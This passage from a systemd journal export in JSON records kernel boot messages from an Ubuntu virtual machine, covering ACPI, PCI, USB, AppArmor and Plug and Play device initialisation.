"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=113;b=e2b08827b5804427b422c10c84f1567e;m=567b61;t=5bd16dd19fac8;x=769b2591422f969", "__REALTIME_TIMESTAMP" : "1615280779950792", "__MONOTONIC_TIMESTAMP" : "5667681", 
"_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "352146", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKD] (IRQs 5 10 *11)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=114;b=e2b08827b5804427b422c10c84f1567e;m=567b6c;t=5bd16dd19fad3;x=195d7febbfa8445e", "__REALTIME_TIMESTAMP" : "1615280779950803", "__MONOTONIC_TIMESTAMP" : "5667692", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "355786", "MESSAGE" : "ACPI: PCI Interrupt Link [LNKS] (IRQs *9)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=115;b=e2b08827b5804427b422c10c84f1567e;m=567b76;t=5bd16dd19fadd;x=b6df4498793218fa", "__REALTIME_TIMESTAMP" : "1615280779950813", "__MONOTONIC_TIMESTAMP" : "5667702", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "356645", "MESSAGE" : "SCSI subsystem initialized" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=116;b=e2b08827b5804427b422c10c84f1567e;m=567b81;t=5bd16dd19fae9;x=8d55216e4c7e3dcd", "__REALTIME_TIMESTAMP" : "1615280779950825", "__MONOTONIC_TIMESTAMP" : "5667713", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "358701", "MESSAGE" : "libata version 3.00 loaded." 
} { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=117;b=e2b08827b5804427b422c10c84f1567e;m=567c19;t=5bd16dd19fb80;x=c2175f8ff043c5a4", "__REALTIME_TIMESTAMP" : "1615280779950976", "__MONOTONIC_TIMESTAMP" : "5667865", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "358802", "MESSAGE" : "pci 0000:00:02.0: vgaarb: setting as boot VGA device" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=118;b=e2b08827b5804427b422c10c84f1567e;m=567c9d;t=5bd16dd19fc04;x=7a84bcfa070c7460", "__REALTIME_TIMESTAMP" : "1615280779951108", "__MONOTONIC_TIMESTAMP" : "5667997", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360000", "MESSAGE" : "pci 0000:00:02.0: vgaarb: VGA device added: decodes=io+mem,owns=io+mem,locks=none" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=119;b=e2b08827b5804427b422c10c84f1567e;m=567d39;t=5bd16dd19fca0;x=8ee36903463241db", "__REALTIME_TIMESTAMP" : "1615280779951264", "__MONOTONIC_TIMESTAMP" : "5668153", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_KERNEL_SUBSYSTEM" : "pci", "_KERNEL_DEVICE" : "+pci:0000:00:02.0", "_UDEV_SYSNAME" : "0000:00:02.0", "_SOURCE_MONOTONIC_TIMESTAMP" : "360008", "MESSAGE" : "pci 0000:00:02.0: vgaarb: bridge control 
possible" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11a;b=e2b08827b5804427b422c10c84f1567e;m=569d98;t=5bd16dd1a1d00;x=3a17ec29797ff8da", "__REALTIME_TIMESTAMP" : "1615280779959552", "__MONOTONIC_TIMESTAMP" : "5676440", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "363066", "MESSAGE" : "vgaarb: loaded" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11b;b=e2b08827b5804427b422c10c84f1567e;m=569dac;t=5bd16dd1a1d14;x=1b30f904cb43f9ba", "__REALTIME_TIMESTAMP" : "1615280779959572", "__MONOTONIC_TIMESTAMP" : "5676460", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "364055", "MESSAGE" : "ACPI: bus type USB registered" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11c;b=e2b08827b5804427b422c10c84f1567e;m=569db8;t=5bd16dd1a1d20;x=97b8feb4e6f9b89", "__REALTIME_TIMESTAMP" : "1615280779959584", "__MONOTONIC_TIMESTAMP" : "5676472", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "366051", "MESSAGE" : "usbcore: registered new interface driver usbfs" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11d;b=e2b08827b5804427b422c10c84f1567e;m=569dc3;t=5bd16dd1a1d2a;x=42fa479078c5c9e8", "__REALTIME_TIMESTAMP" : "1615280779959594", "__MONOTONIC_TIMESTAMP" : "5676483", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "368021", "MESSAGE" : "usbcore: registered new interface driver hub" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11e;b=e2b08827b5804427b422c10c84f1567e;m=569dcd;t=5bd16dd1a1d35;x=fa26700969233205", "__REALTIME_TIMESTAMP" : "1615280779959605", "__MONOTONIC_TIMESTAMP" : "5676493", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "370837", "MESSAGE" : "usbcore: registered new device driver usb" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=11f;b=e2b08827b5804427b422c10c84f1567e;m=569dd9;t=5bd16dd1a1d40;x=a30123e6c2ae603e", "__REALTIME_TIMESTAMP" : "1615280779959616", "__MONOTONIC_TIMESTAMP" : "5676505", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "372107", "MESSAGE" : "EDAC MC: Ver: 3.0.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=120;b=e2b08827b5804427b422c10c84f1567e;m=569de3;t=5bd16dd1a1d4a;x=4154a9cbb9225c3a", "__REALTIME_TIMESTAMP" : "1615280779959626", "__MONOTONIC_TIMESTAMP" : "5676515", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "374382", "MESSAGE" : "PCI: Using ACPI for IRQ routing" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=121;b=e2b08827b5804427b422c10c84f1567e;m=569ded;t=5bd16dd1a1d55;x=2f78176316d38990", "__REALTIME_TIMESTAMP" : "1615280779959637", "__MONOTONIC_TIMESTAMP" : 
"5676525", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376022", "MESSAGE" : "PCI: pci_cache_line_size set to 64 bytes" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=122;b=e2b08827b5804427b422c10c84f1567e;m=569df8;t=5bd16dd1a1d5f;x=a1fa3e5d92e59af1", "__REALTIME_TIMESTAMP" : "1615280779959647", "__MONOTONIC_TIMESTAMP" : "5676536", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376268", "MESSAGE" : "e820: reserve RAM buffer [mem 0x0009fc00-0x0009ffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=123;b=e2b08827b5804427b422c10c84f1567e;m=569e08;t=5bd16dd1a1d70;x=33fcc6444001df97", "__REALTIME_TIMESTAMP" : "1615280779959664", "__MONOTONIC_TIMESTAMP" : "5676552", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_SOURCE_MONOTONIC_TIMESTAMP" : "376272", "MESSAGE" : "e820: reserve RAM buffer [mem 0x7ffdc000-0x7fffffff]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=124;b=e2b08827b5804427b422c10c84f1567e;m=569e1a;t=5bd16dd1a1d81;x=7de80462cb8c7234", "__REALTIME_TIMESTAMP" : "1615280779959681", "__MONOTONIC_TIMESTAMP" : "5676570", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "376470", "MESSAGE" : "NetLabel: Initializing" } { "__CURSOR" : 
"s=d9fa7adefbe34ae1aa61d7656b4137d4;i=125;b=e2b08827b5804427b422c10c84f1567e;m=569e2d;t=5bd16dd1a1d95;x=745e5eda13f04557", "__REALTIME_TIMESTAMP" : "1615280779959701", "__MONOTONIC_TIMESTAMP" : "5676589", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "378389", "MESSAGE" : "NetLabel: domain hash size = 128" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=126;b=e2b08827b5804427b422c10c84f1567e;m=569e3b;t=5bd16dd1a1da2;x=5eb1798268020a50", "__REALTIME_TIMESTAMP" : "1615280779959714", "__MONOTONIC_TIMESTAMP" : "5676603", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "380004", "MESSAGE" : "NetLabel: protocols = UNLABELED CIPSOv4 CALIPSO" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=127;b=e2b08827b5804427b422c10c84f1567e;m=569e56;t=5bd16dd1a1dbd;x=f7c58fa3f2230516", "__REALTIME_TIMESTAMP" : "1615280779959741", "__MONOTONIC_TIMESTAMP" : "5676630", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "383125", "MESSAGE" : "NetLabel: unlabeled traffic allowed by default" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=128;b=e2b08827b5804427b422c10c84f1567e;m=569e61;t=5bd16dd1a1dc8;x=daa121a1bb582c16", "__REALTIME_TIMESTAMP" : "1615280779959752", "__MONOTONIC_TIMESTAMP" : "5676641", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : 
"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "384157", "MESSAGE" : "clocksource: Switched to clocksource kvm-clock" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=129;b=e2b08827b5804427b422c10c84f1567e;m=569e7a;t=5bd16dd1a1de2;x=594e45daf27ba689", "__REALTIME_TIMESTAMP" : "1615280779959778", "__MONOTONIC_TIMESTAMP" : "5676666", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "PRIORITY" : "5", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "_SOURCE_MONOTONIC_TIMESTAMP" : "399085", "MESSAGE" : "VFS: Disk quotas dquot_6.6.0" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12a;b=e2b08827b5804427b422c10c84f1567e;m=569e85;t=5bd16dd1a1ded;x=1c5f6b3ad0a4a228", "__REALTIME_TIMESTAMP" : "1615280779959789", "__MONOTONIC_TIMESTAMP" : "5676677", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "401433", "MESSAGE" : "VFS: Dquot-cache hash table entries: 512 (order 0, 4096 bytes)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12b;b=e2b08827b5804427b422c10c84f1567e;m=569e8f;t=5bd16dd1a1df7;x=e4ee10d3baf6d49a", "__REALTIME_TIMESTAMP" : "1615280779959799", "__MONOTONIC_TIMESTAMP" : "5676687", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "405167", "MESSAGE" : "AppArmor: AppArmor Filesystem Enabled" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12c;b=e2b08827b5804427b422c10c84f1567e;m=569e9d;t=5bd16dd1a1e05;x=25ba10917f9ea7ff", "__REALTIME_TIMESTAMP" : 
"1615280779959813", "__MONOTONIC_TIMESTAMP" : "5676701", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "407740", "MESSAGE" : "pnp: PnP ACPI init" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12d;b=e2b08827b5804427b422c10c84f1567e;m=569f31;t=5bd16dd1a1e99;x=5b4cb66e7102180b", "__REALTIME_TIMESTAMP" : "1615280779959961", "__MONOTONIC_TIMESTAMP" : "5676849", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:00", "_UDEV_SYSNAME" : "00:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "409661", "MESSAGE" : "pnp 00:00: Plug and Play ACPI device, IDs PNP0b00 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12e;b=e2b08827b5804427b422c10c84f1567e;m=569fe9;t=5bd16dd1a1f51;x=85e432ba051410c7", "__REALTIME_TIMESTAMP" : "1615280779960145", "__MONOTONIC_TIMESTAMP" : "5677033", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:01", "_UDEV_SYSNAME" : "00:01", "_SOURCE_MONOTONIC_TIMESTAMP" : "409719", "MESSAGE" : "pnp 00:01: Plug and Play ACPI device, IDs PNP0303 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=12f;b=e2b08827b5804427b422c10c84f1567e;m=56a05f;t=5bd16dd1a1fc6;x=25b3311a744d6bbf", "__REALTIME_TIMESTAMP" : "1615280779960262", "__MONOTONIC_TIMESTAMP" : "5677151", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" 
: "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:02", "_UDEV_SYSNAME" : "00:02", "_SOURCE_MONOTONIC_TIMESTAMP" : "409747", "MESSAGE" : "pnp 00:02: Plug and Play ACPI device, IDs PNP0f13 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=130;b=e2b08827b5804427b422c10c84f1567e;m=56a0ec;t=5bd16dd1a2054;x=b684f5eb4ed39c3e", "__REALTIME_TIMESTAMP" : "1615280779960404", "__MONOTONIC_TIMESTAMP" : "5677292", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409763", "MESSAGE" : "pnp 00:03: [dma 2]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=131;b=e2b08827b5804427b422c10c84f1567e;m=56a166;t=5bd16dd1a20cd;x=e03675d55dbb4263", "__REALTIME_TIMESTAMP" : "1615280779960525", "__MONOTONIC_TIMESTAMP" : "5677414", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:03", "_UDEV_SYSNAME" : "00:03", "_SOURCE_MONOTONIC_TIMESTAMP" : "409774", "MESSAGE" : "pnp 00:03: Plug and Play ACPI device, IDs PNP0700 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=132;b=e2b08827b5804427b422c10c84f1567e;m=56a1ed;t=5bd16dd1a2155;x=49979f895bc17be0", "__REALTIME_TIMESTAMP" : "1615280779960661", "__MONOTONIC_TIMESTAMP" : "5677549", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : 
"ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pnp", "_KERNEL_DEVICE" : "+pnp:00:04", "_UDEV_SYSNAME" : "00:04", "_SOURCE_MONOTONIC_TIMESTAMP" : "409905", "MESSAGE" : "pnp 00:04: Plug and Play ACPI device, IDs PNP0501 (active)" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=133;b=e2b08827b5804427b422c10c84f1567e;m=56a1fc;t=5bd16dd1a2163;x=82c61eaf87e091e3", "__REALTIME_TIMESTAMP" : "1615280779960675", "__MONOTONIC_TIMESTAMP" : "5677564", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "410192", "MESSAGE" : "pnp: PnP ACPI: found 5 devices" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=134;b=e2b08827b5804427b422c10c84f1567e;m=56a208;t=5bd16dd1a216f;x=b32a5fd21dfbf6c0", "__REALTIME_TIMESTAMP" : "1615280779960687", "__MONOTONIC_TIMESTAMP" : "5677576", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "_SOURCE_MONOTONIC_TIMESTAMP" : "418312", "MESSAGE" : "clocksource: acpi_pm: mask: 0xffffff max_cycles: 0xffffff, max_idle_ns: 2085701024 ns" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=135;b=e2b08827b5804427b422c10c84f1567e;m=56a2b2;t=5bd16dd1a221a;x=71898ba80ca4cc7d", "__REALTIME_TIMESTAMP" : "1615280779960858", "__MONOTONIC_TIMESTAMP" : "5677746", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423093", "MESSAGE" : "pci_bus 0000:00: resource 4 [io 
0x0000-0x0cf7 window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=136;b=e2b08827b5804427b422c10c84f1567e;m=56a327;t=5bd16dd1a228f;x=9f1677c6e475c2ad", "__REALTIME_TIMESTAMP" : "1615280779960975", "__MONOTONIC_TIMESTAMP" : "5677863", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423094", "MESSAGE" : "pci_bus 0000:00: resource 5 [io 0x0d00-0xffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=137;b=e2b08827b5804427b422c10c84f1567e;m=56a3c5;t=5bd16dd1a232d;x=9c27a678ac93cc5c", "__REALTIME_TIMESTAMP" : "1615280779961133", "__MONOTONIC_TIMESTAMP" : "5678021", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423095", "MESSAGE" : "pci_bus 0000:00: resource 6 [mem 0x000a0000-0x000bffff window]" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=138;b=e2b08827b5804427b422c10c84f1567e;m=56a44b;t=5bd16dd1a23b3;x=d0ab404cb0387262", "__REALTIME_TIMESTAMP" : "1615280779961267", "__MONOTONIC_TIMESTAMP" : "5678155", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_TRANSPORT" : "kernel", "SYSLOG_FACILITY" : "0", "SYSLOG_IDENTIFIER" : "kernel", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "7", "_KERNEL_SUBSYSTEM" : "pci_bus", "_KERNEL_DEVICE" : "+pci_bus:0000:00", "_UDEV_SYSNAME" : "0000:00", "_SOURCE_MONOTONIC_TIMESTAMP" : "423096", "MESSAGE" : "pci_bus 0000:00: resource 7 [mem 
